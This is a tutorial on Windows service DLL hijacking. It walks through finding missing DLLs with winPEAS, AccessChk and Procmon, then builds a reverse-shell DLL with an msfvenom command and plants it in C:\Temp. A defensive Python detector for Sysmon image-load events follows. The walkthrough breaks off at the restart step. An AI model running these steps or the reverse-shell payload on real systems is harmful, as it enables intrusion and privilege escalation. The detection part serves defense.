Introduction

DLL hijacking is an attack that exploits the way Windows applications search for and load Dynamic Link Libraries (DLLs). By manipulating which DLL gets resolved, an attacker can execute arbitrary code inside the loading process, and, when that process is a privileged service, gain elevated privileges.
How DLL hijacking works

- Windows services load DLLs with the same privileges as the service itself. If an attacker controls the DLL, their code runs with those privileges.
- Absolute path vulnerability: when a service loads a DLL by a fixed path from a directory that non-privileged users can write to, an attacker can replace that DLL with a malicious one and escalate privileges.
- Missing DLL: if an application requests a DLL that is not present where it expects, Windows continues through its search order, so an attacker can place a malicious DLL of the same name in a directory that is searched and hijack execution.
- Search order: Windows looks for DLLs in a fixed sequence of directories. Attackers exploit this by placing a malicious DLL in a location that is searched before the legitimate copy.
Steps to identify and exploit insecure service executables

- Use winPEAS to list non-Microsoft services:
  `.\winPEASx64.exe quiet servicesinfo`
- Query the service configuration (binary path) with sc, so the directories it uses can be checked for write access:
  `sc qc dllsvc`
- Check the service's access permissions for the current user with AccessChk:
  `.\accesschk.exe /accepteula -uvqc user dllsvc`
- Use Procmon to monitor DLL activity for the service:
  `Procmon64.exe`
- Apply filters to exclude registry and network activity, focusing on DLL-related errors.
- Look for failed DLL load attempts (NAME NOT FOUND results), especially in writable directories such as:
  `C:\Temp`
- Generate a malicious DLL payload with msfvenom:
  `msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=[PORT_NUMBER] -f dll -o hijackme.dll`
- Place the malicious DLL in the target directory:
  `move hijackme.dll C:\Temp`
- Restart the vulnerable service to trigger DLL execution:
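From the defender's side, the same behaviour the walkthrough above relies on (a service process loading an unsigned DLL from a user-writable directory such as `C:\Temp`) is visible in Sysmon's "Image loaded" events (Event ID 7). The script below is an added example, not part of the original page or any tool it mentions: it applies that detection logic to a handful of constructed event records. The field names mirror Sysmon's Event ID 7 fields (`Image`, `ImageLoaded`, `Signed`, `SignatureStatus`, `User`), but all paths, the `dllsvc` executable location and the list of "user-writable" directory patterns are assumptions for the example and should be adjusted to the environment being monitored.

```python
"""Flag DLL loads that look like service DLL hijacking, from Sysmon Event ID 7 records.

Added example with constructed data. Field names follow Sysmon's "Image loaded"
event; every value below is made up for illustration.
"""
from __future__ import annotations

import fnmatch
from dataclasses import dataclass

# Directory patterns a standard user can normally write to.
# Assumption: C:\Temp is world-writable, as in the walkthrough; tune for your estate.
USER_WRITABLE_PATTERNS = (
    r"c:\temp\*",
    r"c:\users\*",
    r"c:\programdata\*",
    r"c:\windows\temp\*",
)

# Accounts under which Windows services commonly run.
SERVICE_ACCOUNTS = {
    r"nt authority\system",
    r"nt authority\local service",
    r"nt authority\network service",
}


@dataclass(frozen=True)
class Finding:
    image: str            # process that performed the load
    dll: str              # DLL that was loaded
    reasons: tuple[str, ...]


def _norm(path: str) -> str:
    """Lower-case and use backslashes so pattern matching is case-insensitive."""
    return path.replace("/", "\\").lower()


def is_user_writable_path(path: str) -> bool:
    """True if the path falls under one of the user-writable directory patterns."""
    p = _norm(path)
    return any(fnmatch.fnmatchcase(p, pat) for pat in USER_WRITABLE_PATTERNS)


def assess_event(ev: dict) -> Finding | None:
    """Return a Finding for one Event ID 7 record, or None if it looks benign."""
    reasons = []
    dll = ev["ImageLoaded"]
    runs_as_service = _norm(ev.get("User", "")) in SERVICE_ACCOUNTS
    if runs_as_service and is_user_writable_path(dll):
        reasons.append("service process loaded a DLL from a user-writable directory")
    if runs_as_service and _norm(ev.get("Signed", "false")) != "true":
        reasons.append("service process loaded an unsigned DLL")
    if not reasons:
        return None
    return Finding(image=ev["Image"], dll=dll, reasons=tuple(reasons))


def scan(events: list[dict]) -> list[Finding]:
    """Run assess_event over a batch of records and keep only the hits."""
    return [f for f in (assess_event(e) for e in events) if f is not None]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {   # normal: a system DLL loaded by svchost from System32
        "Image": r"C:\Windows\System32\svchost.exe",
        "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
        "Signed": "true", "SignatureStatus": "Valid", "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # suspicious: the service from the walkthrough loading an unsigned DLL from C:\Temp
        "Image": r"C:\Program Files\dllsvc\dllsvc.exe",   # assumed location of dllsvc
        "ImageLoaded": r"C:\Temp\hijackme.dll",
        "Signed": "false", "SignatureStatus": "Unavailable", "User": r"NT AUTHORITY\SYSTEM",
    },
    {   # not flagged: a user's own application loading its own unsigned plugin (no privilege gain)
        "Image": r"C:\Users\alice\AppData\Local\Foo\foo.exe",
        "ImageLoaded": r"C:\Users\alice\AppData\Local\Foo\plugin.dll",
        "Signed": "false", "SignatureStatus": "Unavailable", "User": r"DESKTOP\alice",
    },
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"{finding.image} -> {finding.dll}")
        for r in finding.reasons:
            print(f"    - {r}")
```

The two heuristics are deliberately narrow: a load from a user-writable directory by a process running as SYSTEM or one of the service accounts is the condition that turns a hijack into privilege escalation, and an unsigned DLL in such a process is the cheapest corroborating signal. Fixing the root cause is still an ACL question: the directories a service loads from (and its binary path from `sc qc`) should not be writable by standard users.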